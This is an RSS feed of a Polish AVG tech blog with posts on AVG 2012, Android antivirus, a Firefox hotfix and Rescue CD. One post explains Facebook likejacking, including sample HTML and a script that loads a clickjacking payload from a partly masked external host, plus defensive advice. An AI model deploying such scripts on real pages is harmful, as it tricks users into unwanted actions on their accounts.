<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.avg.pl/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>techblog.avg.pl</title>
	
	<link>http://techblog.avg.pl</link>
	<description>Blog techniczny AVG.PL - ciekawostki, nowości, pomoc techniczna od kuchni.</description>
	<lastBuildDate>Thu, 01 Sep 2011 08:30:11 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.avg.pl/techblog-avg-pl" /><feedburner:info uri="techblog-avg-pl" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
		<title>AVG 2012 co nowego?</title>
		<link>http://feeds.avg.pl/~r/techblog-avg-pl/~3/gEmwApEe_pM/</link>
		<comments>http://techblog.avg.pl/index.php/2011/08/avg-2012-co-nowego/#comments</comments>
		<pubDate>Wed, 31 Aug 2011 14:48:15 +0000</pubDate>
		<dc:creator>Arek Zakrzewski</dc:creator>
				<category><![CDATA[Nowości]]></category>
		<category><![CDATA[2012]]></category>
		<category><![CDATA[AVG]]></category>
		<category><![CDATA[Zmiany]]></category>

		<guid isPermaLink="false">http://techblog.avg.pl/?p=611</guid>
		<description><![CDATA[W związku z dzisiejszą premierą nowej wersji AVG 2012 warto opowiedzieć co nowego przynosi ta wersja. Zmiany dotknęły wszystkich linii produktów &#8211; darmowych, dla domu oraz oczywiście dla firm włącznie z AVG Adminem. AVG Free - Zmodyfikowany został kreator instalacji &#8211; w związku z przebudową interfejsu oraz przegrupowaniem komponentów w czasie instalacji zaawansowanej do wyboru [...]]]></description>
			<content:encoded><![CDATA[<p><img class="alignleft size-full wp-image-618" title="avg_logo_pl" src="http://techblog.avg.pl/wp-content/uploads/2011/08/avg_logo_pl.png" alt="" width="189" height="104" />W związku z dzisiejszą premierą nowej wersji AVG 2012 warto opowiedzieć co nowego przynosi ta wersja.</p>
<p>Zmiany dotknęły wszystkich linii produktów &#8211; darmowych, dla domu oraz oczywiście dla firm włącznie z AVG Adminem.</p>
<p><span id="more-611"></span><strong>AVG Free</strong></p>
<p>- Zmodyfikowany został kreator instalacji &#8211; w związku z przebudową interfejsu oraz przegrupowaniem komponentów w czasie instalacji zaawansowanej do wyboru jest poprawiona lista składników</p>
<p>- Ulepszony został proces aktualizacji programu do nowej wersji. Uruchomienie instalacji AVG Free 2012 usunie poprzednią wersję AVG 2011 i zainstaluje nową bez ponownego uruchamiania systemu ( w przypadku aktualizacji z wersji 9.0 do 2012 restart będzie niezbędny)</p>
<p>- Zmiany w Instalatorze Online. W nowej wersji AVG korzystając z instalatora online baza sygnatur nie jest pobierana w czasie instalacji, a po zainstalowaniu programu w czasie pierwszej aktualizacji ma to na celu skrócenie czasu instalacji programu. Program zostaje zainstalowany z bazą podstawową o bardzo ograniczonej skuteczności i natychmiast po zakończeniu instalacji rozpoczyna pobieranie pełnej bazy sygnatur.</p>
<p>- Nowy interfejs użytkownika, w którym pojedyncze składniki zostały scalone w zestawy zgodnie z tym schematem:</p>
<p><img class="alignnone size-full wp-image-612" title="1" src="http://techblog.avg.pl/wp-content/uploads/2011/08/1.png" alt="" width="740" height="338" /></p>
<p>&nbsp;</p>
<p>- Wraz z uporządkowaniem składników w oknie głównym programu, uporządkowano również okno ustawień zaawansowanych.</p>
<p>- Składnik Menedżer Aktualizacji został ukryty.</p>
<p>- Odświeżony został gadżet pulpitu AVG dostępny w systemach Windows Vista oraz 7, zmieniony został jego styl graficzny.</p>
<p>- W menu Pomoc -&gt; Informacje o AVG dodano zakładkę Pomoc Techniczna ze szczegółowymi informacjami o wersji programu, bazy wirusów, licencji oraz linkami do FAQ, forum i działu pobierania.</p>
<p>- Nowa funkcjonalność &#8211; Moje Aplikacje widoczna w oknie głównym programu. Zawiera informacje o zainstalowanych programach dodatkowych od AVG oraz przyciski ułatwiające ich zakup online.</p>
<p>- W skład komponentu Anti-Virus włączono składniki AntiSpyware, Ochronę rezydentną oraz Cache server. Dodatkowo zmienił się wygląd postępu skanowania.</p>
<p>- Składnik Link Scanner został połączony z Ochroną Sieci. Funkcjonalność ochrony sieci w wersji Free jest wyłączona i oznaczona informacją, że do jej aktywacji wymagana jest wersja komercyjna.</p>
<p>- Ochrona poczty E-mail zawiera skaner poczty oraz antyspam podobnie jak Ochrona Sieci w przypadku LinkScannera wymagający zakupu licencji na wersję komercyjną.</p>
<p>- Moduł AntyRootkit został wzbogacony o obsługę wyjątków od skanowania. Niektóre z bezpiecznych programów np. sterownik DaemonTools są wykrywane jako rootkity &#8211; teraz użytkownik ma możliwość utworzyć wyjątek dla takiego pliku.</p>
<p>- Odświeżona wersja AVG Toolbara</p>
<p>- AVG Advice &#8211; nowa cecha programu AVG, która monitoruje użycie zasobów przez przeglądarki IE, Firefox, Chrome, Opera i Safari. Jeśli przeglądarka zacznie zużywać zauważalnie więcej zasobów niż zwykle wyświetlane jest powiadomienie dla użytkownika z propozycją uruchomienia przeglądarki ponownie.</p>
<p>- Znaczne optymalizacje wydajności, głównie w kierunku redukcji użycia pamięci RAM. Zmniejszono ilość procesów AVG, WatchDog nie uruchamia kolejnych procesów, a ładuje biblioteki dynamiczne DLL. Procesy Ochrony rezydentnej oraz serwera cache scalono w jeden proces, jeden z procesów Identity Protection został zastąpiony biblioteką dynamiczną.</p>
<p>&nbsp;</p>
<p><strong>AVG Anti-Virus i Internet Security 2011</strong></p>
<p>- Wszystkie zmiany dotyczące wersji Free dotyczą również wersji komercyjnych.</p>
<p>- W trybie instalacji zaawansowanej użytkownik ma możliwość wykluczenia z instalacji składnika PC Analyzer</p>
<p>- Ulepszony składnik ochrona sieci dostępny jako jeden z elementów LinkScannera wspiera obok dotychczasowo obsługiwanych komunikatorów ICQ, MSN i Yahoo również Skype. Ochrona ta dotyczy przesyłanych przez komunikator plików.</p>
<p>- Ochrona pobierania i P2P w Ochronie Sieci wspiera natywnie aplikacje: uTorrent, Ares, Internet Download Manager, Steam, BitTorrent.</p>
<p>- W wersji Internet Security Ochrona Sieci posiada dodatkowo komponent AVG Accelerator, który wykorzystując sterownik TDI optymalizuje pobieranie plików oraz strumieniowanie video np. z YouTube używając kilku równoległych połączeń. Przyspieszane zasoby pobierane bądź buforowane są automatycznie skanowane.</p>
<p>&nbsp;</p>
<p><strong>AVG Business Edition</strong></p>
<p>- Zmiany wymienione wyżej dla wersji Free oraz komercyjnej mają zastosowanie również w AVG Anti-Virus i Internet Security Business Edition.</p>
<p>- AVG Zdalna Administracja wspiera stacje robocze z AVG 2011 oraz 2012. Brak wsparcia dla AVG 9.0 i 8.5 w AVG Admin 2012.</p>
<p>- Aktualizacja AVG Admin 2011 do 2012 wymaga uruchomienia instalatora nowej wersji. Podczas instalacji baza danych DataCenter zostaje automatycznie skonwertowana do nowej wersji.</p>
<p>- Kreator instalacji sieciowej potrafi teraz wykonywać zdalną aktualizację oprogramowania na stacjach roboczych wraz z reinstalacją zdalną do nowej wersji 2012.</p>
<p>- W konsoli administracyjnej uproszczono interfejs, dodano nowy pulpit z podsumowaniem pracy systemu, uporządkowano menu podręczne oraz dodano opcję zdalnego wyłączania stacji roboczych.</p>
<p><img class="alignnone size-large wp-image-613" title="2" src="http://techblog.avg.pl/wp-content/uploads/2011/08/2-1024x774.png" alt="" width="450" height="340" /></p>
<p>- Nowa funkcjonalność Admin Update Assistant &#8211; pozwala bezproblemowo wykonywać aktualizację AVG Admina do nowszej wersji bez konieczności ręcznego reinstalowania AVG Admina.</p>
<p>- Całkowicie nowa metoda wykonywania zdalnej instalacji sieciowej AVG na stacjach roboczych. Nie jak dotychczas z użyciem AVG Agenta oraz usługi udostępniania plików, a z wykorzystaniem WMI (Windows Management Instrumentation). Do instalacji wymagane są teraz: odpowiedź stacji na ping, aktywne RPC (Zdalne wywołanie procedur), otwarty port 135 TCP oraz konto administratora.</p>
<p>&nbsp;</p>
<p>Na koniec zostawiam zrzut ekranu z nowym interfejsem AVG 2012.</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/08/3.png" target="_blank"><img class="alignnone size-medium wp-image-614" title="3" src="http://techblog.avg.pl/wp-content/uploads/2011/08/3-300x220.png" alt="" width="300" height="220" /></a></p>
<img src="http://feeds.feedburner.com/~r/techblog-avg-pl/~4/gEmwApEe_pM" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://techblog.avg.pl/index.php/2011/08/avg-2012-co-nowego/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		<feedburner:origLink>http://techblog.avg.pl/index.php/2011/08/avg-2012-co-nowego/</feedburner:origLink></item>
		<item>
		<title>Facebook ClipJacking/LikeJacking czyli wymuszanie Lubię To!</title>
		<link>http://feeds.avg.pl/~r/techblog-avg-pl/~3/PCi63KHbAIM/</link>
		<comments>http://techblog.avg.pl/index.php/2011/07/facebook-clipjackinglikejacking-czyli-wymuszanie-lubie-to/#comments</comments>
		<pubDate>Fri, 15 Jul 2011 09:48:49 +0000</pubDate>
		<dc:creator>Arek Zakrzewski</dc:creator>
				<category><![CDATA[Bezpieczeństwo]]></category>
		<category><![CDATA[Clickjacking]]></category>
		<category><![CDATA[Facebook]]></category>
		<category><![CDATA[Likejacking]]></category>
		<category><![CDATA[Lubię to]]></category>

		<guid isPermaLink="false">http://techblog.avg.pl/?p=598</guid>
		<description><![CDATA[W czym rzecz &#8211; na pewno wielu z Was padło już ofiarą skryptów autolike. Pierwsza z metod to tzw. ClipJacking &#8211; zwrócenie uwagi użytkownika rzekomo interesującym klipem wideo. z popularnych to np. jakaś panienka na miniaturce, słodki tygrysek czy kadr z filmu z fragmentem jakiegoś obiektu czy przedmiotu i banalne pytanie What is this? &#8211; [...]]]></description>
			<content:encoded><![CDATA[<p>W czym rzecz &#8211; na pewno wielu z Was padło już ofiarą skryptów autolike.</p>
<p>Pierwsza z metod to tzw. ClipJacking &#8211; zwrócenie uwagi użytkownika rzekomo interesującym klipem wideo. z popularnych to np. jakaś panienka na miniaturce, słodki tygrysek czy kadr z filmu z fragmentem jakiegoś obiektu czy przedmiotu i banalne pytanie What is this? &#8211; Co to jest? Chętni do pomocy klikną i otwiera się nowa zakładka &#8211; sam fakt kliknięcia w ten link na czyjejś tablicy i otwarcie docelowej strony powoduje skopiowanie automatycznie wpisu do nas i ustawienie znacznika Lubię To dla tej strony choć wcale tego nie chcieliśmy &#8211; to właśnie jest ClipJacking.</p>
<p>ClipJacking to jedna z kilku metod na nabijanie licznika Lubię to, wszystkie te sztuczki to właśnie LikeJacking.</p>
<p><span id="more-598"></span></p>
<p>Jak to działa.</p>
<p>Po pierwsze trzeba zwrócić uwagę użytkownika, zachęcić go do kliknięcia. Na facetów działają na pewno takie miniaturki przy wpisach, że któryś z naszych znajomych lubi ten klip <img src='http://techblog.avg.pl/wp-includes/images/smilies/icon_wink.gif' alt=';)' class='wp-smiley' /> </p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/07/01.png" target="_blank"><img class="alignnone size-medium wp-image-599" title="01" src="http://techblog.avg.pl/wp-content/uploads/2011/07/01-300x218.png" alt="" width="300" height="218" /></a></p>
<p>Skoro zwróciliśmy uwagę użytkownika i kliknął to został przekierowany na nową zakładkę i zamierza owy film obejrzeć. W kodzie docelowej witryny mamy:</p>
<p>ukryty iframe:</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/07/03.jpg" target="_blank"><img class="alignnone size-large wp-image-600" title="03" src="http://techblog.avg.pl/wp-content/uploads/2011/07/03-1024x44.jpg" alt="" width="450" height="19" /></a></p>
<p>który ładuje fblike.html</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/07/04.jpg" target="_blank"><img class="alignnone size-large wp-image-601" title="04" src="http://techblog.avg.pl/wp-content/uploads/2011/07/04-1024x255.jpg" alt="" width="450" height="112" /></a></p>
<p>Skrypt umieszczony w kodzie fblike.html powoduje automatyczne wykonanie operacji takiej samej jak procedura kliknięcia w lubię to. Wykonuje się to automatycznie bo użytkownik jest zalogowany do Facebooka &#8211; z facebooka na link trafiliśmy.</p>
<p>Klip na stronie z oszustwem ma 99% szans na to, że nie działa ale sam fakt wejścia na tą stronę powoduje dodanie na naszej tablicy informacji, że użytkownik xxx lubi: i tu będzie ta sama miniaturka, która skusiła nas na tablicy znajomego.</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/07/06.jpg"><img class="alignnone size-full wp-image-602" title="06" src="http://techblog.avg.pl/wp-content/uploads/2011/07/06.jpg" alt="" width="640" height="181" /></a></p>
<p><strong>Jak się przed tym bronić?</strong> Jeśli masz ochotę mimo wszystko sprawdzać podejrzane linki na tablicy znajomego to najbezpieczniejszą metodą jest robienie tego w innej przeglądarce. Używasz np. Firefox i widzisz na tablicy znajomego teoretycznie interesujący link &#8211; kliknij prawym klawiszem, skopiuj adres odnośnika i wklej go w pasku adresu innej przeglądarki &#8211; Opera, Chrome, Internet Explorer. Jeśli okaże się fałszywym to nic się nie stanie klik w LubięTo nie zadziała bo w zapasowej przeglądarce nie jesteś zalogowany do Facebooka.</p>
<p>&nbsp;</p>
<p>Druga metoda to podpięcie przycisku Lubię to pod kursor myszy. Działa to skuteczniej na rzetelnych stronach i sprawia, że kliknięcie w dowolny URL na stronie powoduje pojawienie się tuż pod kursorem przycisku Lubię To. Z reguły czas reakcji i spostrzegawczość użytkowników są niewystarczające i jak zauważymy znaczek podniesionego kciuka to już jest po kliknięciu.</p>
<p>Jak działa taki trick? W kodzie witryny wstawiony będzie skrypt podobny do tego poniżej:</p>
<pre>&lt;html&gt;
    &lt;head&gt;
        &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
        &lt;title&gt;No Cookiecheck, activation at click&lt;/title&gt;
        &lt;script src="http://code.*.com/jquery-1.5.js"&gt;&lt;/script&gt;
&lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;&lt;/script&gt;
&lt;script&gt;window.********* = 1&lt;/script&gt;

&lt;script src="http://likejacking.*********.eu/likejacking.php"&gt;&lt;/script&gt;

    &lt;/head&gt;
    &lt;body&gt;
&lt;a href="javascript:(function(){var s = document.createE*('script');s.src =
'http://likejacking.*.eu/likejacking.php?url=facebook.com&amp;time=10&amp;test';document.getElementsByTagName
('body')[0].appendChild(s);})();"&gt;View Demo&lt;/a&gt;

    &lt;/body&gt;
&lt;/html&gt;</pre>
<p>Efekt wygląda następująco:</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/07/07.png"><img class="alignnone size-full wp-image-605" title="07" src="http://techblog.avg.pl/wp-content/uploads/2011/07/07.png" alt="" width="158" height="91" /></a></p>
<p>Wskazanie kursorem linka View Demo powoduje pojawienie się pod kursorem przycisku like, który wykona klik w Lubię To równocześnie z kliknięciem w URL.</p>
<p>Druga metoda zaimplementowania tego tricku to zmiana headera naszej strony i dodanie:</p>
<pre>&lt;script src="http://code.**.com/jquery-1.5.js"&gt;&lt;/script&gt;
 &lt;script src="http://connect.facebook.net/en_US/all.js#xfbml=1"&gt;&lt;/script&gt;
 &lt;script&gt;window.********** = 1&lt;/script&gt;
 &lt;script src="clickjacking.js"&gt;&lt;/script&gt;</pre>
<p>W wywoływanym skrypcie clickjacking.js na serwerze jest umieszczony kod taki jak <a href="http://wklej.org/id/562053/" target="_blank" onclick="pageTracker._trackPageview('/outgoing/wklej.org/id/562053/?referer=');">podany tutaj</a>.</p>
<p>Trzeba pamiętać, że ta metoda nie jest inicjowana na facebooku &#8211; zalogowany użytkownik klika w link na tablicy znajomego, a działa na dowolnej www, a więc jeśli użytkownik nie jest aktualnie zalogowany do Facebooka np. w innej zakładce to pojawi się iframe z prośbą o zalogowania się.</p>
<p>Różnica między pierwszą, a drugą metodą to użycie w pierwszej metodzie skryptu linkowanego z zewnętrznego serwera, a w drugiej lokalnie przechowywanego.</p>
<p>Pamiętajcie też proszę, że wszystkie skrypty tu podane są jako przykłady i nie powinny być używane na waszych stronach www nawet jeśli uda się Wam poprawić błędy, które celowo w nich zrobiłem.</p>
<img src="http://feeds.feedburner.com/~r/techblog-avg-pl/~4/PCi63KHbAIM" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://techblog.avg.pl/index.php/2011/07/facebook-clipjackinglikejacking-czyli-wymuszanie-lubie-to/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://techblog.avg.pl/index.php/2011/07/facebook-clipjackinglikejacking-czyli-wymuszanie-lubie-to/</feedburner:origLink></item>
		<item>
		<title>AVG Antivirus dla Android</title>
		<link>http://feeds.avg.pl/~r/techblog-avg-pl/~3/x9CmlB2-gb0/</link>
		<comments>http://techblog.avg.pl/index.php/2011/07/avg-antivirus-dla-android/#comments</comments>
		<pubDate>Tue, 05 Jul 2011 07:33:35 +0000</pubDate>
		<dc:creator>Arek Zakrzewski</dc:creator>
				<category><![CDATA[Nowości]]></category>
		<category><![CDATA[Android]]></category>
		<category><![CDATA[AVG]]></category>
		<category><![CDATA[Free]]></category>
		<category><![CDATA[Mobilation]]></category>
		<category><![CDATA[Pro]]></category>
		<category><![CDATA[SMS]]></category>

		<guid isPermaLink="false">http://techblog.avg.pl/?p=582</guid>
		<description><![CDATA[AVG Antivirus dla Android jest już dostępny globalnie, również w języku polskim. Skoro już jest to warto coś o nim opowiedzieć. Zacznijmy od tego, że program jest dostępny w Android Market. Wystarczy w Markecie wyszukać AVG Antivirus lub skorzystać z pomocnego linku poniżej: Antivirus Free Antivirus Pro. Cechy wspólne wersji Free i płatnej Pro. Bezpieczeństwo: [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/07/android-hi.jpg"><img class="alignleft size-full wp-image-593" title="android" src="http://techblog.avg.pl/wp-content/uploads/2011/07/android-hi.jpg" alt="" width="160" height="120" /></a>AVG Antivirus dla Android jest już dostępny globalnie, również w języku polskim. Skoro już jest to warto coś o nim opowiedzieć.</p>
<p>Zacznijmy od tego, że program jest dostępny w Android Market.</p>
<p>Wystarczy w Markecie wyszukać AVG Antivirus lub skorzystać z pomocnego linku poniżej:</p>
<p><a title="AVG FREE" href="https://market.android.com/details?id=com.antivirus" target="_blank" onclick="pageTracker._trackPageview('/outgoing/market.android.com/details?id=com.antivirus&amp;referer=');">Antivirus Free</a> <a title="AVG PRO" href="https://market.android.com/details?id=org.antivirus" target="_blank" onclick="pageTracker._trackPageview('/outgoing/market.android.com/details?id=org.antivirus&amp;referer=');">Antivirus Pro</a>.</p>
<p>Cechy wspólne wersji Free i płatnej Pro.</p>
<p><span id="more-582"></span></p>
<p><strong>Bezpieczeństwo:</strong></p>
<ul>
<li>Skanowanie całego urządzenia pamięci ROM i karty SD</li>
<li>Skanowanie według definiowanego przez użytkownika harmonogramu co tydzień, codziennie lub na żądanie</li>
<li>Skanowanie aplikacji</li>
<li>Skanowanie ustawień systemowych</li>
<li>Skanowanie zawartości &#8211; kontakty, wiadomości SMS/MMS, zakładki, pliki</li>
<li>Skanowanie mediów &#8211; zdjęcia, muzyka, filmy wideo</li>
</ul>
<p><strong>Ochrona przed kradzieżą:</strong></p>
<ul>
<li>Możliwość odnalezienia skradzionego telefonu przez GPS</li>
<li>Zdalne wyświetlanie wiadomości na skradzionym telefonie</li>
<li>Zdalna blokada urządzenia i usunięcie wszystkich danych</li>
<li>Zdalne zarządzanie aplikacjami</li>
</ul>
<p><strong>Ochrona SMS:</strong></p>
<ul>
<li>Antyspam dla wiadomości SMS</li>
</ul>
<p><strong>Pro vs. Free</strong></p>
<ul>
<li>Główne różnice między wersją PRO a darmową to:</li>
<li>Ochrona SMS Premium &#8211; analiza wiadomości SMS w czasie rzeczywistym, blokowanie spamu SMS`owego przed pobraniem na telefon</li>
<li>Wsparcie techniczne &#8211; użytkownicy wersji komercyjnej są objęci pomocą techniczną</li>
<li>Wersja PRO jest pozbawiona reklam</li>
<li>W wersji Free Backup Aplikacji i Blokady Aplikacji działają tylko jako wersje testowe przez 14 dni</li>
</ul>
<p><strong>Wersje Androida</strong></p>
<ul>
<li>Android 1.5</li>
<li>Android 1.6</li>
<li>Android 2.0/2.1</li>
<li>Android 2.2</li>
<li>Android 2.3</li>
<li>Android 3.0/3.1</li>
</ul>
<p>Android 1.5 choć jest wspierany i program na nim działa to zalecane jest używanie programu AVG Antivirus na Android 1.6 lub nowszym.</p>
<p><strong>Zależność funkcjonalności od wersji Android</strong></p>
<ul>
<li>Backup aplikacji działa z Android 1.6 lub nowszym</li>
<li>Wyszukiwanie telefonu przez GPS  &#8211; Android 2.1 lub nowszy</li>
<li>Kopia zapasowa danych &#8211; Android 2.1 lub nowszy</li>
<li>Usługa lokalizacji telefonu &#8211; Android 2.1 lub nowszy</li>
<li>Zdalne czyszczenie skradzionego telefonu &#8211; Android 2.2 lub nowszy</li>
<li>Zdalna blokada urządzenia &#8211; Android 2.2 lub nowszy</li>
</ul>
<div id="attachment_588" class="wp-caption aligncenter" style="width: 416px"><a href="http://techblog.avg.pl/wp-content/uploads/2011/07/Bez%C2%A0tytu%C5%82u.png"><img class="size-full wp-image-588 " title="Free+PRO" src="http://techblog.avg.pl/wp-content/uploads/2011/07/Bez%C2%A0tytu%C5%82u.png" alt="Od lewej AVG Free i PRO" width="406" height="304" /></a><p class="wp-caption-text">Od lewej AVG Free i PRO</p></div>
<p style="text-align: center;">
<img src="http://feeds.feedburner.com/~r/techblog-avg-pl/~4/x9CmlB2-gb0" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://techblog.avg.pl/index.php/2011/07/avg-antivirus-dla-android/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://techblog.avg.pl/index.php/2011/07/avg-antivirus-dla-android/</feedburner:origLink></item>
		<item>
		<title>AVG LinkScanner dla Firefox5</title>
		<link>http://feeds.avg.pl/~r/techblog-avg-pl/~3/0z7B-vMxat8/</link>
		<comments>http://techblog.avg.pl/index.php/2011/06/avg-linkscanner-dla-firefox5/#comments</comments>
		<pubDate>Fri, 24 Jun 2011 09:21:35 +0000</pubDate>
		<dc:creator>Arek Zakrzewski</dc:creator>
				<category><![CDATA[Nowości]]></category>
		<category><![CDATA[Aktualizacja]]></category>
		<category><![CDATA[AVG]]></category>
		<category><![CDATA[Firefox]]></category>
		<category><![CDATA[LinkScanner]]></category>

		<guid isPermaLink="false">http://techblog.avg.pl/?p=579</guid>
		<description><![CDATA[Udostępniona została dziś poprawka AVG dla wszystkich wersji zarówno darmowych jak i komercyjnych. Hotfix 1388 dodaje aktualizację modułu SafeSearch dla Firefox 5. AVG powinno się automatycznie uaktualnić do wersji 10.0.1388 &#8211; sprawdźcie w oknie głównym, w lewym, dolnym rogu aktualną wersję. Jeśli nie ma jeszcze 1388 to klikamy w aktualizuj teraz. Aktualizacja jest również dostępna [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/06/55b5f_firefox.png"><img class="alignleft size-full wp-image-580" title="FF5" src="http://techblog.avg.pl/wp-content/uploads/2011/06/55b5f_firefox.png" alt="" width="96" height="96" /></a>Udostępniona została dziś poprawka AVG dla wszystkich wersji zarówno darmowych jak i komercyjnych. Hotfix 1388 dodaje aktualizację modułu SafeSearch dla Firefox 5.</p>
<p>AVG powinno się automatycznie uaktualnić do wersji 10.0.1388 &#8211; sprawdźcie w oknie głównym, w lewym, dolnym rogu aktualną wersję. Jeśli nie ma jeszcze 1388 to klikamy w aktualizuj teraz. Aktualizacja jest również dostępna jako pakiet instalacyjny. Wszystkie aktualne instalatory są już dostępne w naszym pobierz: <a title="Pobierz" href="http://www.avg.pl/pobierz.html" target="_blank" onclick="pageTracker._trackPageview('/outgoing/www.avg.pl/pobierz.html?referer=');">http://www.avg.pl/pobierz.html</a></p>
<p>Po uaktualnieniu AVG do 1388 pozostaje włączyć dodatek AVG &#8211; w Firefox wybieramy Dodatki, włączamy SafeSearch i potwierdzamy ponowne uruchomienie przeglądarki.</p>
<img src="http://feeds.feedburner.com/~r/techblog-avg-pl/~4/0z7B-vMxat8" height="1" width="1"/>]]></content:encoded>
			<wfw:commentRss>http://techblog.avg.pl/index.php/2011/06/avg-linkscanner-dla-firefox5/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		<feedburner:origLink>http://techblog.avg.pl/index.php/2011/06/avg-linkscanner-dla-firefox5/</feedburner:origLink></item>
		<item>
		<title>AVG Rescue CD część 2.</title>
		<link>http://feeds.avg.pl/~r/techblog-avg-pl/~3/1QEqWt8dMl4/</link>
		<comments>http://techblog.avg.pl/index.php/2011/06/avg-rescue-cd-czesc-2/#comments</comments>
		<pubDate>Tue, 21 Jun 2011 12:53:19 +0000</pubDate>
		<dc:creator>Arek Zakrzewski</dc:creator>
				<category><![CDATA[Poradnik]]></category>
		<category><![CDATA[AVG]]></category>
		<category><![CDATA[bootowalny]]></category>
		<category><![CDATA[CD]]></category>
		<category><![CDATA[Rescue CD]]></category>
		<category><![CDATA[skanowanie]]></category>
		<category><![CDATA[USB]]></category>

		<guid isPermaLink="false">http://techblog.avg.pl/?p=560</guid>
		<description><![CDATA[W związku z tym, że dostałem ostatnio kilka pytań o RescueCD jak również w komentarzach do poprzedniego wpisu pojawiły się prośby o więcej informacji opowiem o RescueCD trochę więcej. Bootowanie z RescueCD Do wyboru mamy następującą listę po starcie komputera z płytki lub nośnika USB: AVG Rescue CD &#8211; start w domyślnej konfiguracji AVG Rescue [...]]]></description>
			<content:encoded><![CDATA[<p>W związku z tym, że dostałem ostatnio kilka pytań o RescueCD jak również w komentarzach do poprzedniego wpisu pojawiły się prośby o więcej informacji opowiem o RescueCD trochę więcej.</p>
<p><span id="more-560"></span></p>
<p><strong>Bootowanie z RescueCD</strong></p>
<p>Do wyboru mamy następującą listę po starcie komputera z płytki lub nośnika USB:</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_1346261.png"><img class="size-medium wp-image-563 alignnone" title="Bootowanie" src="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_1346261-300x195.png" alt="" width="300" height="195" /></a></p>
<ul>
<li>AVG Rescue CD &#8211; start w domyślnej konfiguracji</li>
<li>AVG Rescue CD with Disabled Framebuffer &#8211; w przypadku problemów z wyświetlaniem tryb bez bufora ramki powinien działać poprawnie</li>
<li>AVG Rescue CD with Resolution Selection &#8211; opcja bootowania z framebufferem ale z wyborem rozdzielczości przydatna w przypadku nietypowych systemów lub problemów z wyświetlaniem</li>
<li>Boot from floppy &#8211; uruchomienie systemu/boot recordu zapisanego na dyskietce</li>
<li>Boot from hard disk &#8211; uruchomienie systemu lub boot sektora z dysku twardego ustawionego jako pierwszy w BIOS</li>
<li>Boot from next device in the BIOS boot sequence &#8211; jeśli CD lub USB był pierwszym urządzeniem bootowalnym to ta opcja pominie nośnik i uruchomi kolejne urządzenie w kolejności według ustawień BIOS</li>
<li>Memtest86+ &#8211; uruchamia narzędzie do testowania pamięci RAM, które wykryje ewentualne problemy z pamięcią jak błędy odczytu/zapisu.</li>
<li>Exit to the syslinux boot prompt &#8211; wyjście do wiersza poleceń bootowania syslinux.</li>
</ul>
<p>Po 1-2 minutach od wybrania trybu Rescue CD zostaniemy poproszeni o zaakceptowanie licencji na oprogramowanie.</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_135615.png"><img class="alignnone size-medium wp-image-565" title="Licencja" src="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_135615-300x239.png" alt="" width="300" height="239" /></a></p>
<p>Enterem wybieramy I agree i pojawi się monit o testowaniu połączenia internetowego.</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_135623.png"><img class="alignnone size-medium wp-image-566" title="test" src="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_135623-300x239.png" alt="" width="300" height="239" /></a></p>
<p>Na tym etapie sprawdzana jest poprawność konfiguracji połączeń sieciowych inicjowana automatycznie przez dhclienta w czasie bootowania. Jeśli konfiguracja się nie powiodła pojawi się opcja ręcznego przypisania adresu IP, maski podsieci i bramy, która będzie wykorzystywana.</p>
<p><strong>Menu główne.</strong></p>
<p>Najważniejsza opcja to oczywiście Scan. Opcja skanowania dysków lub wybranych folderów na wykrytych dyskach twardych.</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_135652.png"><img class="alignnone size-medium wp-image-568" title="Scan1" src="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_135652-300x239.png" alt="" width="300" height="239" /></a></p>
<p>Po wybraniu opcji skanowania pojawi się zalecenie wykonania aktualizacji baz wirusów przed rozpoczęciem skanowania.</p>
<p><a href="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_135915.png"><img class="alignnone size-medium wp-image-567" title="Update1" src="http://techblog.avg.pl/wp-content/uploads/2011/06/SnapShot_110621_135915-300x239.png" alt="" width="300" height="239" /></a></p>
